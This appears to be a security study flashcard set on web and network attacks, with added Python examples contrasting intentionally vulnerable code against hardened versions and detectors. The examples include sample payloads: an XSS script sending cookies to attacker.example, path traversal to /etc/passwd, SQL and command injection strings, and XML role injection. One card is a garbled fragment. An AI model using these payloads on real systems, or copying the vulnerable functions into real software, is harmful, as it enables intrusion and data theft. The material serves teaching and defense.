Question | Answer |
zero day attacks | exploit previously unknown vulnerabilities, so there is no time to prepare a defense |
securing web applications | hardening the web server |
securing web applications | protecting the network |
most common web application attacks | cross site scripting |
most common web application attacks | sql injection |
most common web application attacks | xml injection |
most common web application attacks | command injection/directory traversal |
cross site scripting | injects script into a web application server to direct attacks at its clients |
attacks that target applications | web application attacks |
attacks that target applications | client side attacks |
attacks that target applications | buffer overflow attacks |
cross site scripting | refers to an attack using scripting that or |
xss attack requires a web site to meet two criteria | accepts user input without validating it |
xss attack requires a web site to meet two criteria | uses input in a response without encoding it |
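Added example (not part of the original flashcard set): the two criteria above, side by side in code. The page template and the payload are constructed for the example; the hostname attacker.example is hypothetical. The vulnerable renderer meets both criteria, the hardened one breaks the second by HTML-encoding the input before it reaches the response.

```python
import html

# Constructed template: a page that reflects a user-supplied name into HTML.
PAGE_TEMPLATE = "<html><body><h1>Hello, {name}!</h1></body></html>"

# Constructed payload of the kind a reflected or stored XSS attack carries:
# it ships the victim's cookies to a host the attacker controls (hypothetical hostname).
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


def render_vulnerable(name: str) -> str:
    """Meets both criteria: the input is not validated and is placed in the
    response without encoding, so markup in `name` becomes markup in the page."""
    return PAGE_TEMPLATE.format(name=name)


def render_hardened(name: str) -> str:
    """Breaks the second criterion: the input is encoded for the HTML text
    context before it is placed in the response. quote=True also encodes
    quotation marks, which matters if the value ever lands inside an attribute."""
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True))


def contains_script_element(page: str) -> bool:
    """Crude check used only to show the difference between the two renderings:
    is there an unencoded <script ...> start tag in the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
```

Encoding is context-specific: html.escape is right for text and quoted attributes, but a value placed inside a script block or a URL needs the encoding for that context instead.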
sql injection | targets sql servers by injecting commands |
sql | used to view and manipulate data stored in a relational database |
zero day attacks | exploit previously unknown vulnerabilities, so victims have zero days to prepare |
because the content of http transmissions is typically not examined | attackers use this protocol to target flaws in web application software |
cross site scripting | xss |
xss attack | injects script into a web application server that will then direct attacks at clients |
cross site scripting attacks | use the server as a platform to launch attacks on other computers that access it |
cross site scripting attack | a user visits an injected web site; the malicious instructions are sent to the victim's web browser and executed there |
other xss attacks | designed to steal sensitive information that the browser retained from visiting sites |
buffer overflow | occurs when a process attempts to store data in ram beyond the boundaries of a fixed-length storage buffer |
xml | extensible markup language |
markup language | method for adding annotations to the text so that the additions can be distinguished from the text itself |
html | markup language designed to display data with the primary focus on how the data looks |
xml injection | an attack that injects xml tags and data into a database |
xpath injection | operates on web sites that use user-supplied information to construct an XPath query for XML data |
sql | used to manipulate data stored in relational data base |
sql injection | targets sql servers by injecting commands |
directory traversal attack | an attack that takes advantage of a vulnerability in the web application program |
command injection | injecting commands that the server then executes |
to perform a directory traversal attack | an attacker needs only a web browser and knowledge of the location of default files and directories on the system under attack |
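Added example (not part of the original flashcard set): how a traversal request escapes the web root, and the check that stops it. The document root /var/www/html is hypothetical; posixpath is used so the result is the same on any platform. The hardened resolver decodes once, then tests the normalized result rather than searching the input for "..", which is what defeats encoded and doubled spellings of the escape.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root used for the example.
WEB_ROOT = "/var/www/html"


def resolve_vulnerable(requested: str) -> str:
    """Join the request path onto the root and never check where it ends up.
    '../' sequences walk out of the root; an absolute path replaces it."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, requested))


def resolve_hardened(requested: str):
    """Return the file path to serve, or None if the request escapes the root."""
    # Decode exactly once so %2e%2e%2f cannot slip past a textual '..' check.
    decoded = unquote(requested)
    # Reject absolute paths, backslashes and NUL bytes outright.
    if decoded.startswith("/") or "\\" in decoded or "\x00" in decoded:
        return None
    # Normalize, then confirm the result is still inside the root. Checking the
    # normalized result (rather than the raw input) catches every spelling of
    # the escape, including 'images/../../x'.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("images/logo.png", "../../etc/passwd", "%2e%2e/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{req!r:45} vulnerable={resolve_vulnerable(req)!r:30} hardened={resolve_hardened(req)!r}")
```

On a real server the final path should also be resolved with symlinks followed (os.path.realpath) and re-checked, since a symlink inside the root can point outside it.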
a response of "email address unknown" to a test input in a lookup form | indicates that user input is being properly filtered |
a server failure in response to the same test input | indicates that user input is not being filtered; instead all user input is being sent directly to the database |
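Added example (not part of the original flashcard set): the two cards above describe probing a lookup form with malformed input. The in-memory sqlite3 table and the sample rows are constructed for the example. The vulnerable lookup concatenates the e-mail address into the statement, so a stray quote produces the "server failure" and a crafted input returns every row; the parameterized lookup returns "email address unknown" for the same inputs because the value can no longer change the query's structure.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the users table a 'forgot password' form would query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users (email, password_hash) VALUES (?, ?)",
        [("alice@example.com", "h1"), ("bob@example.com", "h2")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str):
    """User input is concatenated straight into the statement: no filtering at all."""
    sql = "SELECT email FROM users WHERE email = '" + email + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        # The 'server failure' case: malformed input surfaces as a database error.
        return f"server failure: {exc}"


def lookup_parameterized(conn: sqlite3.Connection, email: str):
    """The driver sends the value separately from the statement text, so quotes
    and keywords inside the value are just characters of an e-mail address."""
    rows = [row[0] for row in conn.execute("SELECT email FROM users WHERE email = ?", (email,))]
    return rows if rows else "email address unknown"


if __name__ == "__main__":
    db = make_db()
    for probe in ("alice@example.com", "'", "' OR 'x'='x"):
        print(f"{probe!r:20} vulnerable={lookup_vulnerable(db, probe)!r}")
        print(f"{'':20} parameterized={lookup_parameterized(db, probe)!r}")
```

The probe `' OR 'x'='x` turns the vulnerable statement into `... WHERE email = '' OR 'x'='x'`, which is true for every row; a lone `'` leaves an unterminated string and the database rejects the statement.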
xml | designed to carry data instead of indicating how to display it |
xml | users define their own tags |
XML tags begin with the less-than character (“<”) and end with the greater-than character (“>”). You use tags to mark the start and end of elements, which are the logical units of information in an XML document | tags |
An element consists of a start tag, possibly followed by text and other complete elements, followed by an end tag | elements |
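Added example (not part of the original flashcard set): because XML elements are delimited by tags, input spliced into the document text can close the current element and open new ones. This is the XML injection card above in code. The user record layout and the payload are constructed; the hardened builder uses the standard library's ElementTree serializer, which escapes `<`, `>` and `&` in text so the input stays character data.

```python
import xml.etree.ElementTree as ET


def build_user_vulnerable(username: str, role: str = "user") -> str:
    """Input is spliced into the markup text, so tags in the input become tags in
    the document (no validation, no encoding)."""
    return f"<users><user><name>{username}</name><role>{role}</role></user></users>"


def build_user_hardened(username: str, role: str = "user") -> str:
    """The serializer escapes markup characters in text nodes, so the input can
    only ever be the content of <name>, never new elements."""
    root = ET.Element("users")
    user = ET.SubElement(root, "user")
    ET.SubElement(user, "name").text = username
    ET.SubElement(user, "role").text = role
    return ET.tostring(root, encoding="unicode")


def roles_in(document: str) -> list:
    """What the application would later read back: one role per <user> element."""
    return [u.findtext("role") for u in ET.fromstring(document).findall("user")]


def names_in(document: str) -> list:
    return [u.findtext("name") for u in ET.fromstring(document).findall("user")]


# Constructed payload: closes the current <name> and <user>, injects a second
# user with a privileged role, and reopens a <name> so the document stays well-formed.
PAYLOAD = "eve</name><role>admin</role></user><user><name>eve2"


if __name__ == "__main__":
    print(build_user_vulnerable(PAYLOAD))
    print(roles_in(build_user_vulnerable(PAYLOAD)))   # the injected admin role is real
    print(build_user_hardened(PAYLOAD))
    print(roles_in(build_user_hardened(PAYLOAD)))     # one user, role unchanged
```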
markup language | method for adding annotations to text |
html | uses tags surrounded by angle brackets |
html | instructs the browser to display text in a specific format |
xpath injection | attempts to exploit xml path language (xpath) queries that are built from user input |
annotation | note that is made while reading any form of text |
html | displays data |
xml | carries data |
client side attacks | targets vulnerabilities in client applications that interact with a compromised server or process malicious data |
server side attacks | web application attacks |
drive by download | a user's computer becomes compromised just by viewing a web page, without clicking any content |
IFrame | inline frame |
iframe | an html element that embeds another html document inside the main document |
common client side attacks | header manipulation |
common client side attacks | cookies and attachments |
common client side attacks | session hijacking |
common client side attacks | malicious add ons |
directory traversal attack | attacker moves from root directory to restricted directories |
command injection attack | attackers enter commands to execute on a server |
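Added example (not part of the original flashcard set): a command injection in the shape the card describes, beside the fix. The ping utility is used as the constructed scenario; the hostname regex is a standard RFC 1123 shape and the allow-list is the example's own. The vulnerable form builds a string for a shell; the hardened form validates the target and passes an argv list, so no shell ever parses attacker input.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_command_vulnerable(target: str) -> str:
    """A single string meant for subprocess.run(cmd, shell=True). The shell parses
    it, so ';', '|', '&&' and '$(...)' inside `target` start new commands."""
    return "ping -c 1 " + target


def is_valid_target(target: str) -> bool:
    """Allow-list: an IP address literal or a well-formed hostname, nothing else."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def ping_command_hardened(target: str):
    """Validate, then build an argv list. No shell is involved and the target is
    always exactly one argument, so it cannot become a second command or an
    extra option (the allow-list also rejects a leading '-')."""
    if not is_valid_target(target):
        return None
    return ["ping", "-c", "1", target]


def run_ping(target: str) -> int:
    """Execute the hardened form; returns the exit status, or -1 if rejected."""
    argv = ping_command_hardened(target)
    if argv is None:
        return -1
    return subprocess.run(argv, capture_output=True, timeout=10).returncode


if __name__ == "__main__":
    attack = "8.8.8.8; cat /etc/passwd"
    print(ping_command_vulnerable(attack))   # a shell would run both commands
    print(ping_command_hardened(attack))     # None: rejected before anything runs
```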
http header | composed of fields that describe the characteristics of the data being transmitted |
http header attacks | referer manipulation |
http header attacks | accept-language manipulation |
drive by download | attackers craft a zero-pixel iframe to avoid visual detection |
zero pixel iframe | an iframe sized to zero pixels, so the embedded html document loads without being visible to the user |
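Added example (not part of the original flashcard set): a scanner for the zero-pixel frames the two cards above describe. The sample page and the hostnames in it are constructed; detection flags iframes whose width or height is zero or whose inline style hides them, which is the common way a drive-by download page keeps the exploit frame out of sight.

```python
from html.parser import HTMLParser

# Constructed page: an ordinary embedded video plus two frames that pull exploit
# pages from a hypothetical hostname without the visitor seeing anything.
SAMPLE_PAGE = """
<html><body>
<h1>Daily news</h1>
<iframe src="https://video.example/embed/42" width="560" height="315"></iframe>
<iframe src="http://malicious.example/exploit.html" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://malicious.example/second.html" style="display: none;"></iframe>
</body></html>
"""


class HiddenFrameFinder(HTMLParser):
    """Collects the src of every iframe that is sized or styled to be invisible."""

    def __init__(self):
        super().__init__()
        self.hidden = []

    @staticmethod
    def _zero(value) -> bool:
        value = (value or "").strip().lower().rstrip("px")
        return value in ("0", "0.0")

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}          # bare attributes parse as None
        style = a.get("style", "").replace(" ", "").lower()
        invisible = (
            self._zero(a.get("width")) or self._zero(a.get("height"))
            or "display:none" in style or "visibility:hidden" in style
        )
        if invisible:
            self.hidden.append(a.get("src", ""))


def find_hidden_iframes(page: str) -> list:
    finder = HiddenFrameFinder()
    finder.feed(page)
    finder.close()
    return finder.hidden


if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_PAGE):
        print("hidden iframe ->", src)
```

In practice attackers also use 1x1 frames, off-screen positioning and CSS classes defined elsewhere, so a production scanner would render the page or resolve the stylesheet rather than rely on inline attributes alone.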
http header fields | referer |
http header fields | accept-language |
http header fields | server |
http header fields | set-cookie |
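Added example (not part of the original flashcard set): every header field above is set by the client, which is the whole point of the Referer and Accept-Language attacks. The two raw requests and the hostname bank.example are constructed. The example parses the headers, shows that a check resting on Referer alone passes a forged request, adds the per-session token that an attacker cannot supply, and validates Accept-Language before it is used anywhere.

```python
import hmac
import re

# Constructed requests. The first is what the bank's own page sends; the second
# is what an attacker sends with a hand-picked Referer and a script in
# Accept-Language, hoping it is echoed into a page or a query. Hostnames are hypothetical.
LEGIT_REQUEST = (
    b"POST /account/transfer HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"Referer: https://bank.example/account\r\n"
    b"Accept-Language: en-US,en;q=0.9,de;q=0.5\r\n"
    b"X-CSRF-Token: 7f3a9c\r\n"
    b"Cookie: session=abc123\r\n"
    b"Content-Length: 0\r\n\r\n"
)
FORGED_REQUEST = (
    b"POST /account/transfer HTTP/1.1\r\n"
    b"Host: bank.example\r\n"
    b"Referer: https://bank.example/account\r\n"
    b"Accept-Language: <script>alert(1)</script>,en\r\n"
    b"Cookie: session=abc123\r\n"
    b"Content-Length: 0\r\n\r\n"
)


def parse_headers(raw: bytes) -> dict:
    """Split the request head into a dict keyed by lower-cased field name
    (field names are case-insensitive, so fold them before any comparison)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:            # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().decode("ascii").lower()] = value.strip().decode("latin-1")
    return headers


def referer_only_check(headers: dict) -> bool:
    """Authorization that trusts Referer to prove the request came from our page.
    Referer is just another client-supplied field, so this is bypassable."""
    return headers.get("referer", "").startswith("https://bank.example/")


def referer_and_token_check(headers: dict, expected_token: str) -> bool:
    """Referer may stay as a hint, but the decision rests on a per-session
    anti-CSRF token the attacker cannot read or set. compare_digest avoids a
    timing side channel on the comparison."""
    return referer_only_check(headers) and hmac.compare_digest(
        headers.get("x-csrf-token", ""), expected_token)


LANG_TAG_RE = re.compile(r"^[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*$")


def parse_accept_language(value: str) -> list:
    """Return well-formed language tags ordered by q-value; anything else is
    dropped rather than passed on to a template or a database query."""
    tags = []
    for part in value.split(","):
        tag, _, q = part.strip().partition(";q=")
        try:
            weight = float(q) if q else 1.0
        except ValueError:
            continue
        if LANG_TAG_RE.match(tag):
            tags.append((weight, tag))
    return [tag for _, tag in sorted(tags, key=lambda t: -t[0])]
```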
types of cookies | first party |
types of cookies | third party |
types of cookies | session |
types of cookies | persistent |
types of cookies | secure |
types of cookies | flash |
arp | part of the tcp/ip protocol suite, used to determine the mac address that corresponds to a known ip address |
first party cookie | created from the web site that is currently being viewed |
flash cookie | also called local shared objects |
flash cookie | cannot be deleted through the browser's normal configuration settings |
persistent cookie | tracking cookie |
persistent cookie | recorded on the hard drive and does not expire when the browser closes |
secure cookie | used when a browser is visiting a server using a secure connection |
session cookie | stored in ram and only lasts for duration of the visit |
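Added example (not part of the original flashcard set): the cookie types above, identified from real Set-Cookie headers. The four headers and the hostnames are constructed. A cookie with Expires or Max-Age is persistent, otherwise it is a session cookie; first or third party depends on whether the cookie's scope matches the site being viewed; Secure and HttpOnly are the flags that matter for the session hijacking cards later on.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers as they might arrive while a user browses
# news.example. Each entry is (host that sent the response, header value).
PAGE_HOST = "news.example"
RESPONSES = [
    ("news.example", "sid=9f2c1a; Path=/; Secure; HttpOnly"),
    ("news.example", "prefs=dark; Path=/; Max-Age=31536000"),
    ("ads.example", "track=u77; Domain=.ads.example; Path=/; Expires=Wed, 21 Oct 2026 07:28:00 GMT"),
    ("news.example", "legacy=1; Path=/"),
]


def is_third_party(page_host: str, set_by_host: str, domain_attr: str) -> bool:
    """A cookie is first party when its scope is the site being viewed (or a
    parent of it); anything else was set by a third party such as an advertiser."""
    scope = (domain_attr or set_by_host).lstrip(".").lower()
    return not (page_host == scope or page_host.endswith("." + scope))


def classify(page_host: str, responses) -> dict:
    """Map each cookie name to its lifetime, party and security attributes, with
    warnings for cookies a session hijacker could easily capture."""
    result = {}
    for set_by_host, header in responses:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            persistent = bool(morsel["expires"] or morsel["max-age"])
            info = {
                "lifetime": "persistent" if persistent else "session",
                "party": "third" if is_third_party(page_host, set_by_host, morsel["domain"]) else "first",
                "secure": bool(morsel["secure"]),
                "httponly": bool(morsel["httponly"]),
                "warnings": [],
            }
            if not info["secure"]:
                info["warnings"].append("sent over plain http too: readable on the wire")
            if not info["httponly"]:
                info["warnings"].append("readable by page scripts: exposed to xss")
            result[name] = info
    return result


if __name__ == "__main__":
    for name, info in classify(PAGE_HOST, RESPONSES).items():
        print(name, info)
```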
syn flood attack | takes advantage of the procedures for initiating a tcp session |
transitive access | an attack involving a third party to gain access rights |
smurf attack | broadcasts a ping to all computers on the network yet changes the address from which the request came to that of the target |
type of dos attack | ping flood |
type of dos attack | smurf attack |
type of interception attack | man in the middle |
type of interception attack | replay attack |
distributed denial of service attack | may use hundreds or thousands of zombie computers in a botnet to flood a device with requests |
man in the middle attack | makes it appear that two computers are communicating with each other when actually they are sending and receiving data with a pc in between |
replay attack | similar to man in the middle, except that a copy of the transmission is made before it is sent on, to be replayed later |
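Added example (not part of the original flashcard set): the server-side defense against the replay described above. The shared key, the message body and the timeline are constructed. A MAC binds a nonce and timestamp to the body, so a captured copy is rejected as a replay, a stale copy is rejected by the time window, and an altered copy fails the signature.

```python
import hashlib
import hmac

# Assumption for the example: client and server share this secret out of band.
SHARED_KEY = b"constructed-demo-key-not-for-production"


def sign(message: bytes, nonce: str, timestamp: int) -> str:
    """MAC over nonce, timestamp and body so none of them can be altered in transit."""
    data = f"{nonce}|{timestamp}|".encode() + message
    return hmac.new(SHARED_KEY, data, hashlib.sha256).hexdigest()


class ReplayGuard:
    """Server side: accept each (nonce, timestamp) once, within a time window."""

    def __init__(self, window_seconds: int = 30):
        self.window = window_seconds
        self.seen = {}          # nonce -> timestamp, pruned as the window moves

    def accept(self, message: bytes, nonce: str, timestamp: int, tag: str, now: int) -> str:
        # 1. Authenticity first: a forged or tampered message never gets further.
        if not hmac.compare_digest(sign(message, nonce, timestamp), tag):
            return "bad signature"
        # 2. Freshness: a captured message cannot be held and sent much later.
        if abs(now - timestamp) > self.window:
            return "stale"
        # 3. Uniqueness within the window: the exact same message is rejected.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if nonce in self.seen:
            return "replay"
        self.seen[nonce] = timestamp
        return "ok"


def demo() -> list:
    """Constructed exchange: one legitimate transfer, the attacker's replay of the
    captured copy, an attempt to change the amount, and a copy sent too late."""
    guard = ReplayGuard()
    now = 1_700_000_000
    body = b'{"to":"acct-42","amount":100}'
    tag = sign(body, "n-1", now)
    results = [guard.accept(body, "n-1", now, tag, now)]
    results.append(guard.accept(body, "n-1", now, tag, now + 5))
    results.append(guard.accept(b'{"to":"acct-42","amount":9000}', "n-1", now, tag, now + 5))
    results.append(guard.accept(body, "n-2", now, sign(body, "n-2", now), now + 300))
    return results


if __name__ == "__main__":
    print(demo())
```

The nonce store only needs to cover the window, which is why expired entries are pruned on every call; without the timestamp the server would have to remember every nonce forever.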
arp poisoning | attack that corrupts the arp cache |
dns poisoning | attack that substitutes dns addresses so that the computer is automatically redirected to another device |
types of attacks generated from arp poisoning | steal data |
types of attacks generated from arp poisoning | prevent internet access |
types of attacks generated from arp poisoning | man in the middle |
types of attacks generated from arp poisoning | dos attack |
cache | temporary storage |
domain name system | a hierarchical name system for matching computer names and numbers |
cookie | a file on a local pc in which a server stores user-specific information |
cookie | used to identify repeat visitors; only the site that created the cookie can read it |
first party cookie | created from the web site that a user is currently viewing |
third party cookie | site advertisers use these to record user preferences |
flash cookie | named after adobe flash player |
respawning | used to reinstate regular cookies that a user has deleted or blocked |
flash cookies | stored in multiple locations |
session token | a random string assigned to an interaction between a user and a web application; the browser presents it on each request so the server can recognize the user |
session hijacking | attackers attempt to impersonate user by stealing or guessing session token |
session token | random string assigned to a user's interaction with a web application, used for verification purposes |
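Added example (not part of the original flashcard set): what "stealing or guessing" a session token means in practice, and the server-side handling that makes guessing hopeless. The SessionStore class and the sequential weak token are the example's own constructions. Tokens come from the OS CSPRNG, are compared in constant time, are rotated after login, and are set with the cookie flags that limit theft.

```python
import hmac
import secrets


def weak_token(counter: int) -> str:
    """Sequential 'token': anyone who sees one can guess the next user's."""
    return f"{counter:08d}"


def guess_neighbours(observed: str, spread: int = 3) -> list:
    """What an attacker does with a weak token: enumerate nearby values."""
    n = int(observed)
    return [weak_token(n + d) for d in range(-spread, spread + 1) if d != 0]


def strong_token() -> str:
    """32 bytes (256 bits) from the OS CSPRNG, URL-safe so it fits a cookie value.
    Guessing is infeasible; stealing it (XSS, plaintext HTTP) is the remaining risk."""
    return secrets.token_urlsafe(32)


class SessionStore:
    def __init__(self):
        self._sessions = {}   # token -> username

    def create(self, user: str) -> str:
        token = strong_token()
        self._sessions[token] = user
        return token

    def lookup(self, presented: str):
        """Constant-time comparison against each stored token, so response timing
        does not reveal how many leading characters of a guess were right."""
        for token, user in self._sessions.items():
            if hmac.compare_digest(token, presented):
                return user
        return None

    def rotate(self, old_token: str):
        """Issue a fresh token after login or a privilege change and invalidate the
        old one, so a token captured earlier stops working."""
        user = self._sessions.pop(old_token, None)
        return self.create(user) if user is not None else None

    @staticmethod
    def cookie_header(token: str) -> str:
        # Secure: only sent over TLS. HttpOnly: not readable by page scripts.
        # SameSite: not sent on cross-site requests. No Expires/Max-Age: a session
        # cookie that disappears when the browser closes.
        return f"session={token}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print("guesses from one weak token:", guess_neighbours("00001234"))
    store = SessionStore()
    tok = store.create("alice")
    print(store.cookie_header(tok))
```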
malicious add-ons | add-ons are programs that provide additional functionality to web browsers; malicious ones abuse that access |
Active X | a set of rules and controls for making programs interactive |
ping flood attack | uses the internet control message protocol to flood a victim with packets |
buffer overflow attack | data overflows into adjacent memory locations |
buffer overflow attack | attackers can change return address |
network attacks | denial of service |
network attack | interception |
network attack | poisoning |
network attack | attack on access rights |
spoofing | impersonation of another computer or device |
smurf attack | ping request with originating address changed |
syn flood attack | uses the three way handshake to attack |
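Added example (not part of the original flashcard set): the handshake abuse behind the SYN flood cards, seen from the server. The packet trace, the backlog limit and the cookie secret are constructed, and the SYN cookie scheme is a simplified version of the real one. The report counts handshakes that were answered with SYN-ACK but never completed; the SYN cookie shows the defense, which encodes the connection in the sequence number instead of holding a half-open entry for each SYN.

```python
import hashlib
import hmac
import struct
from collections import defaultdict

# Constructed trace of client-side segments: (src_ip, src_port, flags). One real
# client completes the handshake; 40 SYNs from spoofed sources never send the ACK.
TRACE = [("10.0.0.5", 51000, "SYN"), ("10.0.0.5", 51000, "ACK")]
TRACE += [(f"203.0.113.{i}", 40000 + i, "SYN") for i in range(1, 41)]


def half_open_report(trace, backlog_limit: int = 32) -> dict:
    """Count handshakes the server answered with SYN-ACK but never saw completed.
    A flood shows up as many sources with exactly one pending SYN each."""
    pending = defaultdict(int)
    for src, sport, flags in trace:
        key = (src, sport)
        if flags == "SYN":
            pending[key] += 1
        elif flags == "ACK" and pending[key] > 0:
            pending[key] -= 1
    half_open = sum(pending.values())
    return {
        "half_open": half_open,
        "backlog_exhausted": half_open >= backlog_limit,
        "sources_with_pending": sum(1 for v in pending.values() if v > 0),
    }


# Assumption: a server-side secret, rotated periodically in a real implementation.
COOKIE_SECRET = b"constructed-demo-secret"


def syn_cookie(src_ip: str, sport: int, dst_ip: str, dport: int, time_slot: int) -> int:
    """Defense: derive the SYN-ACK sequence number from the 4-tuple and a coarse
    time slot, so nothing needs to be stored until the handshake completes."""
    data = f"{src_ip}:{sport}>{dst_ip}:{dport}@{time_slot}".encode()
    return struct.unpack("!I", hmac.new(COOKIE_SECRET, data, hashlib.sha256).digest()[:4])[0]


def verify_syn_cookie(src_ip, sport, dst_ip, dport, ack_number, time_slot, slack=1) -> bool:
    """The completing ACK acknowledges cookie+1. Accept the current slot and the
    previous `slack` slots so legitimate slow clients are not rejected."""
    for slot in range(time_slot, time_slot - slack - 1, -1):
        if (syn_cookie(src_ip, sport, dst_ip, dport, slot) + 1) & 0xFFFFFFFF == ack_number:
            return True
    return False


if __name__ == "__main__":
    print(half_open_report(TRACE))
```

With cookies enabled, the spoofed SYNs in the trace cost the server nothing: a SYN-ACK goes out and, since no ACK ever returns, no state was ever allocated.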
man in the middle | accept legitimate information and respond with counterfeit information |
ddos | virtually impossible to identify and block source of attack |
most common dos attack | distributed denial of service |
man in the middle passive attack | captures the data and uses it later |
arp poisoning | modifies the mac address in the arp cache so that the corresponding ip address points to a different computer |
arp | when the ip address is known but not the mac address, the sending pc broadcasts an arp request to all pcs asking "is this your ip address?" |
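Added example (not part of the original flashcard set): detecting the cache corruption described in the ARP poisoning cards above and at L93 to L98. The reply log and all addresses are constructed. The detector rebuilds the IP to MAC table from replies and alerts when an IP's MAC changes or one MAC claims several IPs, which is the signature of a host inserting itself between a victim and the gateway.

```python
from collections import defaultdict

# Constructed ARP reply log: (time, sender_ip, sender_mac). A real detector would
# read these from a packet capture; they are inline so the example runs offline.
ARP_REPLIES = [
    (0, "192.168.1.1", "aa:bb:cc:00:00:01"),    # gateway announces itself
    (1, "192.168.1.20", "aa:bb:cc:00:00:20"),   # victim announces itself
    (2, "192.168.1.1", "de:ad:be:ef:00:99"),    # attacker claims the gateway's IP
    (3, "192.168.1.20", "de:ad:be:ef:00:99"),   # and the victim's: MITM position
]


def detect_arp_poisoning(replies):
    """Return the ARP table as a host would build it, plus alerts for the two
    poisoning signatures: an IP whose MAC changes, and a MAC claiming many IPs."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"t={t}: {ip} changed from {previous} to {mac}")
        ip_to_mac[ip] = mac                  # the cache is overwritten unconditionally
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"t={t}: {mac} now claims {sorted(mac_to_ips[mac])}")
    return ip_to_mac, alerts


if __name__ == "__main__":
    table, alerts = detect_arp_poisoning(ARP_REPLIES)
    print("resulting cache:", table)
    for a in alerts:
        print("ALERT", a)
```

The table returned is exactly what the victim's cache now holds: traffic for the gateway goes to the attacker's MAC. Static ARP entries for critical hosts, or dynamic ARP inspection on the switch, stop the overwrite that the detector only reports.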
host table | lists the mappings of names to computer numbers |
location for dns poisoning | local host table |
location for dns poisoning | external dns server |
domain name system | expanded from the host table into a hierarchical name system for matching computer names and numbers |
symbolic name | a human-readable name for a computer, matched to its computer number (ip address) by a host table or by dns |
host table name system | an early system in which each computer kept a local host table listing the mappings of names to computer numbers |
zone transfers | dns servers exchange zone information among themselves |
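Added example (not part of the original flashcard set): the check a resolver makes before it caches an answer, which is what a DNS poisoning attacker against an external server has to defeat. The query, the genuine response and the forged responses are constructed from raw DNS wire format with the standard library only; the names and addresses are documentation examples. A response is accepted only if its transaction id and its entire question match the outstanding query, so a forger who cannot see the query must guess the 16-bit id.

```python
import struct

DNS_TYPE_A = 1
DNS_CLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Dotted name to DNS label sequence: length byte + label, terminated by 0."""
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"


def build_query(txid: int, name: str) -> bytes:
    """Standard recursive query: 12-byte header + one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", DNS_TYPE_A, DNS_CLASS_IN)


def build_response(txid: int, name: str, ip: str, ttl: int = 60) -> bytes:
    """Response with one A record. The answer's name is a pointer (0xC00C) back to
    the question name at offset 12, as real servers send it."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", DNS_TYPE_A, DNS_CLASS_IN)
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", DNS_TYPE_A, DNS_CLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_name(data: bytes, offset: int):
    """Decode an uncompressed label sequence; returns (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0:
            raise ValueError("compression pointer where a literal name was expected")
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def validate_response(query: bytes, response: bytes) -> str:
    """Checks a resolver must make before caching anything from the response."""
    if struct.unpack("!H", query[:2])[0] != struct.unpack("!H", response[:2])[0]:
        return "txid mismatch"
    qname, qend = parse_name(query, 12)
    rname, rend = parse_name(response, 12)
    if qname.lower() != rname.lower() or query[qend:qend + 4] != response[rend:rend + 4]:
        return "question mismatch"
    if struct.unpack("!H", response[2:4])[0] & 0x8000 == 0:
        return "not a response"
    return "ok"


def first_a_record(response: bytes) -> str:
    """IPv4 address from the first answer (assumes the pointer-form answer name)."""
    _, offset = parse_name(response, 12)
    offset += 4 + 2                           # qtype + qclass, then the 0xC00C pointer
    _rtype, _rclass, _ttl, rdlength = struct.unpack("!HHIH", response[offset:offset + 10])
    return ".".join(str(b) for b in response[offset + 10:offset + 10 + rdlength])


if __name__ == "__main__":
    query = build_query(0x1234, "www.example.com")
    genuine = build_response(0x1234, "www.example.com", "192.0.2.1")
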